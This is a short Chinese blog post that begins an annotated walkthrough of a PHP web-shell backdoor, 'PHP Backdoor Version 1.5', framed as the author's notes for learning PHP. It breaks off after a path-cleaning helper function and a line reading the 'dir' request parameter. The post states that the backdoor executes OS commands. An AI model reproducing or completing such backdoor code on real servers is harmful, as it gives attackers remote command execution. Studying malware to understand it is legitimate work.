php 后门程序解析
PHP Backdoor Version 1.5是由sirius_black / LOTFREE TEAM编写的一个php后门程序,这里对其进行一下简单解析,也当做自己学习php的笔记,该后门程序成执行的命令,取决于安装web服务器和php时用户的权限,如果是管理员的话,那就可以执行各种操作系统命令。易踪论坛: http://www.yeetrack.com/bbs/forum.php?mod=forumdisplay&fid=39 ,O(∩_∩)O<!--goodlink函数用来过滤掉url中的一些非法字符--> <?php function good_link($link) { $link=ereg_replace("/+","/",$link); $link=ereg_replace("/[^/(..)]+/..","/",$link); $link=ereg_replace("/+","/",$link); if(!strncmp($link,"./",2) && strlen($link)>2)$link=substr($link,2); if($link=="")$link="."; return $link; } //$_REQUEST用来取得提交到本文件的数据 $dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:"."; /